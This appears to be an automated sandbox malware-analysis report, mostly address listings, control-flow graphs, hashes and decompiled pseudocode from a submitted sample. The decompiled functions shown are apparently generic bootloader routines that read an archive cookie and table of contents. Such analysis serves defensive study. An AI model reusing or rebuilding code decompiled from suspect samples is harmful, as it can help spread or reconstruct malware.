                                                                                                                                                                                                                              0x7ff735c48b3f
                                                                                                                                                                                                                              0x7ff735c48b43
                                                                                                                                                                                                                              0x7ff735c48b4c
                                                                                                                                                                                                                              0x7ff735c48b54
                                                                                                                                                                                                                              0x7ff735c48b59
                                                                                                                                                                                                                              0x7ff735c48b62
                                                                                                                                                                                                                              0x7ff735c48b8b
                                                                                                                                                                                                                              0x7ff735c48b94
                                                                                                                                                                                                                              0x7ff735c48b99
                                                                                                                                                                                                                              0x7ff735c48ba1
                                                                                                                                                                                                                              0x7ff735c48ba6
                                                                                                                                                                                                                              0x7ff735c48ba9
                                                                                                                                                                                                                              0x7ff735c48bb1
                                                                                                                                                                                                                              0x7ff735c48bb4
                                                                                                                                                                                                                              0x7ff735c48bb6
                                                                                                                                                                                                                              0x7ff735c48bbe
                                                                                                                                                                                                                              0x7ff735c48bc8
                                                                                                                                                                                                                              0x7ff735c48bd5
                                                                                                                                                                                                                              0x7ff735c48bdc
                                                                                                                                                                                                                              0x7ff735c48be1
                                                                                                                                                                                                                              0x7ff735c48be5
                                                                                                                                                                                                                              0x7ff735c48bf4
                                                                                                                                                                                                                              0x7ff735c48bf9
                                                                                                                                                                                                                              0x7ff735c48bff
                                                                                                                                                                                                                              0x7ff735c48c05
                                                                                                                                                                                                                              0x7ff735c48c07
                                                                                                                                                                                                                              0x7ff735c48c0e
                                                                                                                                                                                                                              0x7ff735c48c13
                                                                                                                                                                                                                              0x7ff735c48c1b
                                                                                                                                                                                                                              0x7ff735c48c20
                                                                                                                                                                                                                              0x7ff735c48c2a
                                                                                                                                                                                                                              0x7ff735c48c2f
                                                                                                                                                                                                                              0x7ff735c48c33
                                                                                                                                                                                                                              0x7ff735c48c38
                                                                                                                                                                                                                              0x7ff735c48c3c
                                                                                                                                                                                                                              0x7ff735c48c40
                                                                                                                                                                                                                              0x7ff735c48c4b
                                                                                                                                                                                                                              0x7ff735c48c53
                                                                                                                                                                                                                              0x7ff735c48c5e
                                                                                                                                                                                                                              0x7ff735c48c66
                                                                                                                                                                                                                              0x7ff735c48c71
                                                                                                                                                                                                                              0x7ff735c48c79
                                                                                                                                                                                                                              0x7ff735c48c7f
                                                                                                                                                                                                                              0x7ff735c48c84
                                                                                                                                                                                                                              0x7ff735c48c8c
                                                                                                                                                                                                                              0x7ff735c48c91
                                                                                                                                                                                                                              0x7ff735c48c96
                                                                                                                                                                                                                              0x7ff735c48c9b
                                                                                                                                                                                                                              0x7ff735c48ca0
                                                                                                                                                                                                                              0x7ff735c48ca5
                                                                                                                                                                                                                              0x7ff735c48caa
                                                                                                                                                                                                                              0x7ff735c48cb3
                                                                                                                                                                                                                              0x7ff735c48cb8
                                                                                                                                                                                                                              0x7ff735c48cbd
                                                                                                                                                                                                                              0x7ff735c48cc4
                                                                                                                                                                                                                              0x7ff735c48cc7
                                                                                                                                                                                                                              0x7ff735c48cd6
                                                                                                                                                                                                                              0x7ff735c48cd8
                                                                                                                                                                                                                              0x7ff735c48cdd
                                                                                                                                                                                                                              0x7ff735c48cdf
                                                                                                                                                                                                                              0x7ff735c48ce4
                                                                                                                                                                                                                              0x7ff735c48ce9
                                                                                                                                                                                                                              0x7ff735c48ced
                                                                                                                                                                                                                              0x7ff735c48cf2
                                                                                                                                                                                                                              0x7ff735c48cfc
                                                                                                                                                                                                                              0x7ff735c48d04
                                                                                                                                                                                                                              0x7ff735c48d06
                                                                                                                                                                                                                              0x7ff735c48d09
                                                                                                                                                                                                                              0x7ff735c48d0c
                                                                                                                                                                                                                              0x7ff735c48d0e
                                                                                                                                                                                                                              0x7ff735c48d14
                                                                                                                                                                                                                              0x7ff735c48d22
                                                                                                                                                                                                                              0x7ff735c48d2d
                                                                                                                                                                                                                              0x7ff735c48d3b
                                                                                                                                                                                                                              0x7ff735c48d43
                                                                                                                                                                                                                              0x7ff735c48d48
                                                                                                                                                                                                                              0x7ff735c48d52
                                                                                                                                                                                                                              0x7ff735c48d5c
                                                                                                                                                                                                                              0x7ff735c48d63
                                                                                                                                                                                                                              0x7ff735c48d7a

                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: $ $invalid block type
                                                                                                                                                                                                                              • API String ID: 0-2056396358
                                                                                                                                                                                                                              • Opcode ID: 7e956ec606c76fc7c560fd31d0c5763725141212e69f9ab17bf9d7a246531ac5
                                                                                                                                                                                                                              • Instruction ID: 4279d2a0bfd65e2fc77ee50837742d0d91668550687e1c42377ac77b1f21f2ca
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7e956ec606c76fc7c560fd31d0c5763725141212e69f9ab17bf9d7a246531ac5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3861C7B390479B5AE761AF15D84CA3EBAEDFB00754F514135C64842390DB3CD946DB10
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C4A4F8 Relevance: 3.0, APIs: 2, Instructions: 18COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 74%
                                                                                                                                                                                                                              			E00007FF77FF735C4A4F8(intOrPtr* __rax, long long __rbx, void* __r8, long long _a8) {
				char _v24;
				void* _t9;
				void* _t10;
				void* _t11;
				signed short _t21;
				void* _t23;
				void* _t27;
				intOrPtr _t37;
				intOrPtr* _t56;
				intOrPtr* _t57;
				void* _t70;

				_t58 = __rbx;
				_t56 = __rax;
				E00007FF77FF735C4AE84(); // executed
				SetUnhandledExceptionFilter(??);
				goto 0x35c580fc;
				asm("int3");
				asm("int3");
				asm("int3");
				_a8 = __rbx;
				_t9 = E00007FF77FF735C4A974(1); // executed
				if (_t9 == 0) goto 0x35c4a660;
				dil = 0;
				_v24 = dil;
				_t10 = E00007FF77FF735C4A938();
				_t37 =  *0x35c8a540; // 0x2
				if (_t37 == 1) goto 0x35c4a66b;
				if (_t37 != 0) goto 0x35c4a59c;
				 *0x35c8a540 = 1;
				_t11 = E00007FF77FF735C57C74(__rbx, 0x35c69458, 0x35c69498); // executed
				if (_t11 == 0) goto 0x35c4a57d;
				goto 0x35c4a655;
				E00007FF77FF735C57C30(_t58, 0x35c69440, 0x35c69450); // executed
				 *0x35c8a540 = 2;
				goto 0x35c4a5a4;
				dil = 1;
				_v24 = dil;
				E00007FF77FF735C4AC88(E00007FF77FF735C4AAE4(_t10, 0x35c69450));
				if ( *_t56 == 0) goto 0x35c4a5d7;
				if (E00007FF77FF735C4AA4C(_t56, _t56) == 0) goto 0x35c4a5d7;
				r8d = 0;
				_t57 =  *_t56;
				E00007FF77FF735C4AC90( *0x35c69428(_t70));
				if ( *_t57 == 0) goto 0x35c4a5f9;
				if (E00007FF77FF735C4AA4C(_t57, _t57) == 0) goto 0x35c4a5f9;
				E00007FF77FF735C57F90( *_t57);
				_t21 = E00007FF77FF735C4ADEC(0x35c69450);
				E00007FF77FF735C57BDC();
				r9d = _t21 & 0x0000ffff;
				_t78 = _t57;
				_t23 = E00007FF77FF735C41000(_t57); // executed
				if (E00007FF77FF735C4AE30(_t57) == 0) goto 0x35c4a675;
				if (dil != 0) goto 0x35c4a62f;
				E00007FF77FF735C57F74(0x7ff735c40000, 0x35c69450, _t57);
				E00007FF77FF735C4AB08(1, 0);
				_t27 = _t23;
				if (E00007FF77FF735C4AE30(_t57) == 0) goto 0x35c4a67d;
				if (_v24 != 0) goto 0x35c4a653;
				E00007FF77FF735C57F64(0x7ff735c40000, 0x35c69450, _t78);
				return _t27;
			}














                                                                                                                                                                                                                              0x7ff735c4a4f8
                                                                                                                                                                                                                              0x7ff735c4a4f8
                                                                                                                                                                                                                              0x7ff735c4a4fc
                                                                                                                                                                                                                              0x7ff735c4a501
                                                                                                                                                                                                                              0x7ff735c4a50c
                                                                                                                                                                                                                              0x7ff735c4a511
                                                                                                                                                                                                                              0x7ff735c4a512
                                                                                                                                                                                                                              0x7ff735c4a513
                                                                                                                                                                                                                              0x7ff735c4a514
                                                                                                                                                                                                                              0x7ff735c4a523
                                                                                                                                                                                                                              0x7ff735c4a52a
                                                                                                                                                                                                                              0x7ff735c4a530
                                                                                                                                                                                                                              0x7ff735c4a533
                                                                                                                                                                                                                              0x7ff735c4a538
                                                                                                                                                                                                                              0x7ff735c4a53f
                                                                                                                                                                                                                              0x7ff735c4a548
                                                                                                                                                                                                                              0x7ff735c4a550
                                                                                                                                                                                                                              0x7ff735c4a552
                                                                                                                                                                                                                              0x7ff735c4a56a
                                                                                                                                                                                                                              0x7ff735c4a571
                                                                                                                                                                                                                              0x7ff735c4a578
                                                                                                                                                                                                                              0x7ff735c4a58b
                                                                                                                                                                                                                              0x7ff735c4a590
                                                                                                                                                                                                                              0x7ff735c4a59a
                                                                                                                                                                                                                              0x7ff735c4a59c
                                                                                                                                                                                                                              0x7ff735c4a59f
                                                                                                                                                                                                                              0x7ff735c4a5ab
                                                                                                                                                                                                                              0x7ff735c4a5b7
                                                                                                                                                                                                                              0x7ff735c4a5c3
                                                                                                                                                                                                                              0x7ff735c4a5c5
                                                                                                                                                                                                                              0x7ff735c4a5ce
                                                                                                                                                                                                                              0x7ff735c4a5d7
                                                                                                                                                                                                                              0x7ff735c4a5e3
                                                                                                                                                                                                                              0x7ff735c4a5ef
                                                                                                                                                                                                                              0x7ff735c4a5f4
                                                                                                                                                                                                                              0x7ff735c4a5f9
                                                                                                                                                                                                                              0x7ff735c4a601
                                                                                                                                                                                                                              0x7ff735c4a606
                                                                                                                                                                                                                              0x7ff735c4a609
                                                                                                                                                                                                                              0x7ff735c4a615
                                                                                                                                                                                                                              0x7ff735c4a623
                                                                                                                                                                                                                              0x7ff735c4a628
                                                                                                                                                                                                                              0x7ff735c4a62a
                                                                                                                                                                                                                              0x7ff735c4a633
                                                                                                                                                                                                                              0x7ff735c4a638
                                                                                                                                                                                                                              0x7ff735c4a645
                                                                                                                                                                                                                              0x7ff735c4a64c
                                                                                                                                                                                                                              0x7ff735c4a64e
                                                                                                                                                                                                                              0x7ff735c4a65f

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 59578552-0
                                                                                                                                                                                                                              • Opcode ID: 01889b2d9551cb2965bb9cfc0b7358b46e5830179e84d6d833e8bc803c407fe8
                                                                                                                                                                                                                              • Instruction ID: 6b9a3bacb9c930ef3ab88907d08710a1dfd141ca7b292ff570bb70f2cbee9873
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 01889b2d9551cb2965bb9cfc0b7358b46e5830179e84d6d833e8bc803c407fe8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 54E08CB3E0D117A5F61A37E64C834BC91916F44B2CFF10635E12D462C2CE5C2492B772
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C417A0 Relevance: 21.2, APIs: 3, Strings: 9, Instructions: 198COMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 0 7ff735c417a0-7ff735c417c1 1 7ff735c417e2-7ff735c417f8 call 7ff735c53790 0->1 2 7ff735c417c3-7ff735c417ce call 7ff735c43b00 0->2 8 7ff735c417fe-7ff735c4180e call 7ff735c4ebd0 1->8 9 7ff735c418c6-7ff735c418d1 call 7ff735c5377c 1->9 5 7ff735c417d3-7ff735c417dc 2->5 5->1 7 7ff735c418f8-7ff735c418fd 5->7 11 7ff735c41a64-7ff735c41a7c 7->11 8->9 16 7ff735c41814-7ff735c41823 call 7ff735c4f154 8->16 9->7 15 7ff735c418d3-7ff735c418e3 call 7ff735c4ebd0 9->15 21 7ff735c41902-7ff735c4191b call 7ff735c4e8b8 15->21 22 7ff735c418e5-7ff735c418f3 call 7ff735c42580 15->22 16->9 23 7ff735c41829 16->23 31 7ff735c4193a-7ff735c41996 call 7ff735c4ebd0 call 7ff735c53790 21->31 32 7ff735c4191d 21->32 22->7 24 7ff735c41830-7ff735c41849 23->24 27 7ff735c418ae-7ff735c418bb call 7ff735c5377c 24->27 28 7ff735c4184b-7ff735c4185b call 7ff735c4ebd0 24->28 27->11 28->27 39 7ff735c4185d-7ff735c4186b call 7ff735c4e8b8 28->39 46 7ff735c41998-7ff735c419b0 call 7ff735c42580 31->46 47 7ff735c419b5-7ff735c419ce call 7ff735c4e8b8 31->47 36 7ff735c41924-7ff735c41935 call 7ff735c42580 32->36 36->11 45 7ff735c41870-7ff735c41873 39->45 45->27 48 7ff735c41875-7ff735c4187c 45->48 46->11 58 7ff735c419dc-7ff735c419f2 call 7ff735c4e62c 47->58 59 7ff735c419d0-7ff735c419d7 47->59 50 7ff735c4187e-7ff735c4188f 48->50 51 7ff735c418a5-7ff735c418ac 48->51 54 7ff735c41892-7ff735c41895 50->54 51->24 51->27 56 7ff735c41897-7ff735c4189a 54->56 57 7ff735c4189c-7ff735c418a3 54->57 56->57 60 7ff735c418c0-7ff735c418c3 56->60 57->51 57->54 63 7ff735c41a07-7ff735c41a0f 58->63 64 7ff735c419f4-7ff735c41a05 call 7ff735c42820 58->64 59->36 60->9 66 7ff735c41a52-7ff735c41a58 63->66 67 7ff735c41a11-7ff735c41a3c 63->67 64->11 71 7ff735c41a5a call 7ff735c4e568 66->71 72 7ff735c41a62 66->72 69 7ff735c41a3e-7ff735c41a42 67->69 70 7ff735c41a46-7ff735c41a4d call 7ff735c42820 67->70 69->67 73 7ff735c41a44 69->73 70->66 76 7ff735c41a5f 71->76 72->11 73->66 76->72
                                                                                                                                                                                                                              C-Code - Quality: 22%
                                                                                                                                                                                                                              			E00007FF77FF735C417A0(long long __rax, long long __rbx, long long* __rcx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
				void* __rdi;
				void* _t44;
				void* _t46;
				void* _t51;
				intOrPtr _t59;
				intOrPtr _t75;
				intOrPtr _t78;
				void* _t93;
				long long _t106;
				intOrPtr* _t108;
				long long _t109;
				void* _t113;
				void* _t116;
				void* _t125;
				long long _t127;
				void* _t132;
				char* _t144;
				intOrPtr* _t150;
				long long* _t152;
				void* _t155;
				void* _t157;
				long long _t163;
				long long _t172;
				long long _t173;

				_t114 = __rbx;
				_t106 = __rax;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t152 = __rcx;
				if ( *((intOrPtr*)(__rcx)) != 0) goto 0x35c417e2;
				E00007FF77FF735C43B00(__rax, __rcx + 0x78, "rb"); // executed
				 *__rcx = __rax;
				_t163 = __rax;
				if (__rax == 0) goto 0x35c418f8;
				r15d = 0;
				0x35c53790(); // executed
				_t172 = __rax;
				if (__rax == 0) goto 0x35c418c6;
				_t4 = _t173 + 2; // 0x2
				r8d = _t4;
				_t44 = E00007FF77FF735C4EBD0(__rax, __rbx, __rax, __rcx); // executed
				if (_t44 < 0) goto 0x35c418c6;
				E00007FF77FF735C4F154(__rax, _t114, __rax, _t152); // executed
				_t115 = _t106;
				if (_t106 - 8 < 0) goto 0x35c418c6;
				_t5 = _t115 - 0x2000; // -8192
				_t155 =  <  ? _t173 : _t5;
				_t116 = _t106 - _t155;
				if (_t116 - 8 < 0) goto 0x35c418ae;
				r8d = 0;
				_t46 = E00007FF77FF735C4EBD0(_t106, _t116, _t163, _t152); // executed
				if (_t46 < 0) goto 0x35c418ae;
				_t168 = _t116;
				E00007FF77FF735C4E8B8(_t155, _t116, _t163); // executed
				if (_t106 != _t116) goto 0x35c418ae;
				_t6 = _t116 - 7; // -7
				_t125 = _t6;
				if (_t125 == 0) goto 0x35c418a5;
				_t78 =  *0x35c694e8; // 0xe0b0a0b
				_t7 = _t172 - 1; // -1
				r8d =  *0x35c694e0; // 0xc49454d
				_t108 = _t7 + _t125;
				if ( *_t108 != r8d) goto 0x35c4189c;
				_t93 =  *((intOrPtr*)(_t108 + 4)) - _t78;
				if (_t93 == 0) goto 0x35c418c0;
				_t109 = _t108 - 1;
				if (_t93 != 0) goto 0x35c41892;
				_t9 = _t155 + 7; // -8185
				if (_t155 != 0) goto 0x35c41830;
				_t127 = _t172;
				E00007FF77FF735C5377C(0x2000, _t127, _t155, _t116);
				goto 0x35c41a64;
				_t157 = _t155 - 1 + _t127;
				E00007FF77FF735C5377C(0x2000, _t172, _t155, _t116);
				if (_t157 == 0) goto 0x35c418f8;
				r8d = 0;
				_t51 = E00007FF77FF735C4EBD0(_t109, _t9,  *_t152, _t152); // executed
				if (_t51 >= 0) goto 0x35c41902;
				_t144 = "Failed to seek to cookie position!\n";
				E00007FF77FF735C42580(_t51, _t109, "fseek", _t144, _t116, _t163);
				goto 0x35c41a64;
				_t11 = _t144 - 0x57; // 0x1, executed
				r8d = _t11;
				E00007FF77FF735C4E8B8(_t144, _t168,  *_t152); // executed
				if (_t109 - 1 >= 0) goto 0x35c4193a;
				_t132 = "fread";
				E00007FF77FF735C42580(_t109 - 1, _t109, _t132, "Failed to read cookie!\n", _t168,  *_t152);
				goto 0x35c41a64;
				r8d = 0;
				asm("bswap eax");
				asm("bswap eax");
				_t59 =  *((intOrPtr*)(_t152 + 0x34));
				asm("bswap ecx");
				asm("bswap eax");
				 *((intOrPtr*)(_t152 + 0x34)) = _t59;
				 *((long long*)(_t152 + 8)) = _t157 - _t132 + 0x58;
				 *((intOrPtr*)(_t152 + 0x507c)) = r15d;
				 *0x35c7bc74 = _t59;
				E00007FF77FF735C4EBD0(_t109, _t9,  *_t152, _t152); // executed
				0x35c53790();
				 *((long long*)(_t152 + 0x10)) = _t109;
				if (_t109 != 0) goto 0x35c419b5;
				E00007FF77FF735C42580(_t109, _t109, "malloc", "Could not allocate buffer for TOC!\n", _t168,  *_t152);
				goto 0x35c41a64;
				r8d = 1;
				E00007FF77FF735C4E8B8( *((intOrPtr*)(_t152 + 0x30)), _t168,  *_t152);
				if (_t109 - 1 >= 0) goto 0x35c419dc;
				goto 0x35c41924;
				 *((long long*)(_t152 + 0x18)) =  *((intOrPtr*)(_t152 + 0x30)) +  *((intOrPtr*)(_t152 + 0x10));
				if (E00007FF77FF735C4E62C( *((intOrPtr*)(_t152 + 0x30)) +  *((intOrPtr*)(_t152 + 0x10)),  *_t152) == 0) goto 0x35c41a07;
				E00007FF77FF735C42820( *((intOrPtr*)(_t152 + 0x30)) +  *((intOrPtr*)(_t152 + 0x10)), "Error on file.\n", "Could not read full TOC!\n", _t168,  *_t152);
				goto 0x35c41a64;
				_t150 =  *((intOrPtr*)(_t152 + 0x10));
				if (_t150 -  *((intOrPtr*)(_t152 + 0x18)) >= 0) goto 0x35c41a52;
				_t75 =  *_t150;
				asm("bswap eax");
				asm("bswap eax");
				asm("bswap eax");
				asm("bswap ecx");
				 *_t150 = _t75;
				_t113 = _t75 + _t150;
				if (_t113 -  *((intOrPtr*)(_t152 + 0x10)) < 0) goto 0x35c41a46;
				if (_t113 -  *((intOrPtr*)(_t152 + 0x18)) < 0) goto 0x35c41a11;
				goto 0x35c41a52;
				E00007FF77FF735C42820(_t113, "Cannot read Table of Contents.\n", _t113, _t168,  *_t152);
				if ( *_t152 == 0) goto 0x35c41a62; // executed
				E00007FF77FF735C4E568(_t113, _t9,  *_t152, _t152); // executed
				 *_t152 = _t173;
				return 0;
			}



























                                                                                                                                                                                                                              0x7ff735c417a0
                                                                                                                                                                                                                              0x7ff735c417a0
                                                                                                                                                                                                                              0x7ff735c417a0
                                                                                                                                                                                                                              0x7ff735c417a5
                                                                                                                                                                                                                              0x7ff735c417aa
                                                                                                                                                                                                                              0x7ff735c417bb
                                                                                                                                                                                                                              0x7ff735c417c1
                                                                                                                                                                                                                              0x7ff735c417ce
                                                                                                                                                                                                                              0x7ff735c417d3
                                                                                                                                                                                                                              0x7ff735c417d6
                                                                                                                                                                                                                              0x7ff735c417dc
                                                                                                                                                                                                                              0x7ff735c417e2
                                                                                                                                                                                                                              0x7ff735c417ed
                                                                                                                                                                                                                              0x7ff735c417f2
                                                                                                                                                                                                                              0x7ff735c417f8
                                                                                                                                                                                                                              0x7ff735c41800
                                                                                                                                                                                                                              0x7ff735c41800
                                                                                                                                                                                                                              0x7ff735c41807
                                                                                                                                                                                                                              0x7ff735c4180e
                                                                                                                                                                                                                              0x7ff735c41817
                                                                                                                                                                                                                              0x7ff735c4181c
                                                                                                                                                                                                                              0x7ff735c41823
                                                                                                                                                                                                                              0x7ff735c41837
                                                                                                                                                                                                                              0x7ff735c4183e
                                                                                                                                                                                                                              0x7ff735c41842
                                                                                                                                                                                                                              0x7ff735c41849
                                                                                                                                                                                                                              0x7ff735c4184b
                                                                                                                                                                                                                              0x7ff735c41854
                                                                                                                                                                                                                              0x7ff735c4185b
                                                                                                                                                                                                                              0x7ff735c41860
                                                                                                                                                                                                                              0x7ff735c4186b
                                                                                                                                                                                                                              0x7ff735c41873
                                                                                                                                                                                                                              0x7ff735c41875
                                                                                                                                                                                                                              0x7ff735c41875
                                                                                                                                                                                                                              0x7ff735c4187c
                                                                                                                                                                                                                              0x7ff735c4187e
                                                                                                                                                                                                                              0x7ff735c41884
                                                                                                                                                                                                                              0x7ff735c41888
                                                                                                                                                                                                                              0x7ff735c4188f
                                                                                                                                                                                                                              0x7ff735c41895
                                                                                                                                                                                                                              0x7ff735c41897
                                                                                                                                                                                                                              0x7ff735c4189a
                                                                                                                                                                                                                              0x7ff735c4189c
                                                                                                                                                                                                                              0x7ff735c418a3
                                                                                                                                                                                                                              0x7ff735c418a5
                                                                                                                                                                                                                              0x7ff735c418ac
                                                                                                                                                                                                                              0x7ff735c418ae
                                                                                                                                                                                                                              0x7ff735c418b1
                                                                                                                                                                                                                              0x7ff735c418bb
                                                                                                                                                                                                                              0x7ff735c418c3
                                                                                                                                                                                                                              0x7ff735c418c9
                                                                                                                                                                                                                              0x7ff735c418d1
                                                                                                                                                                                                                              0x7ff735c418d6
                                                                                                                                                                                                                              0x7ff735c418dc
                                                                                                                                                                                                                              0x7ff735c418e3
                                                                                                                                                                                                                              0x7ff735c418e5
                                                                                                                                                                                                                              0x7ff735c418f3
                                                                                                                                                                                                                              0x7ff735c418fd
                                                                                                                                                                                                                              0x7ff735c4190e
                                                                                                                                                                                                                              0x7ff735c4190e
                                                                                                                                                                                                                              0x7ff735c41912
                                                                                                                                                                                                                              0x7ff735c4191b
                                                                                                                                                                                                                              0x7ff735c41924
                                                                                                                                                                                                                              0x7ff735c4192b
                                                                                                                                                                                                                              0x7ff735c41935
                                                                                                                                                                                                                              0x7ff735c4193d
                                                                                                                                                                                                                              0x7ff735c41943
                                                                                                                                                                                                                              0x7ff735c4194b
                                                                                                                                                                                                                              0x7ff735c41950
                                                                                                                                                                                                                              0x7ff735c41953
                                                                                                                                                                                                                              0x7ff735c4195d
                                                                                                                                                                                                                              0x7ff735c4195f
                                                                                                                                                                                                                              0x7ff735c41966
                                                                                                                                                                                                                              0x7ff735c4196a
                                                                                                                                                                                                                              0x7ff735c41971
                                                                                                                                                                                                                              0x7ff735c41981
                                                                                                                                                                                                                              0x7ff735c4198a
                                                                                                                                                                                                                              0x7ff735c4198f
                                                                                                                                                                                                                              0x7ff735c41996
                                                                                                                                                                                                                              0x7ff735c419a6
                                                                                                                                                                                                                              0x7ff735c419b0
                                                                                                                                                                                                                              0x7ff735c419b9
                                                                                                                                                                                                                              0x7ff735c419c5
                                                                                                                                                                                                                              0x7ff735c419ce
                                                                                                                                                                                                                              0x7ff735c419d7
                                                                                                                                                                                                                              0x7ff735c419e7
                                                                                                                                                                                                                              0x7ff735c419f2
                                                                                                                                                                                                                              0x7ff735c419fb
                                                                                                                                                                                                                              0x7ff735c41a05
                                                                                                                                                                                                                              0x7ff735c41a07
                                                                                                                                                                                                                              0x7ff735c41a0f
                                                                                                                                                                                                                              0x7ff735c41a14
                                                                                                                                                                                                                              0x7ff735c41a16
                                                                                                                                                                                                                              0x7ff735c41a1e
                                                                                                                                                                                                                              0x7ff735c41a26
                                                                                                                                                                                                                              0x7ff735c41a2b
                                                                                                                                                                                                                              0x7ff735c41a2d
                                                                                                                                                                                                                              0x7ff735c41a32
                                                                                                                                                                                                                              0x7ff735c41a3c
                                                                                                                                                                                                                              0x7ff735c41a42
                                                                                                                                                                                                                              0x7ff735c41a44
                                                                                                                                                                                                                              0x7ff735c41a4d
                                                                                                                                                                                                                              0x7ff735c41a58
                                                                                                                                                                                                                              0x7ff735c41a5a
                                                                                                                                                                                                                              0x7ff735c41a5f
                                                                                                                                                                                                                              0x7ff735c41a7c

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _fread_nolock$Message
                                                                                                                                                                                                                              • String ID: Cannot read Table of Contents.$Could not allocate buffer for TOC!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$fread$fseek$malloc
                                                                                                                                                                                                                              • API String ID: 677216364-1463511288
                                                                                                                                                                                                                              • Opcode ID: 97a72f7b35cbd490bb3e2541a85f668f175ac35ef1f238ff55ea6dbd7e162742
                                                                                                                                                                                                                              • Instruction ID: 1025ef3c4bb8f5e2b89c0ff08878a55cf197189ba03f84a35b76683543a3119e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 97a72f7b35cbd490bb3e2541a85f668f175ac35ef1f238ff55ea6dbd7e162742
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5581D4B3B09663A6EA15EB26D540678E3A2FF44F98F848531DA4D43B81DF3CE560D720
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C41440 Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 133COMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
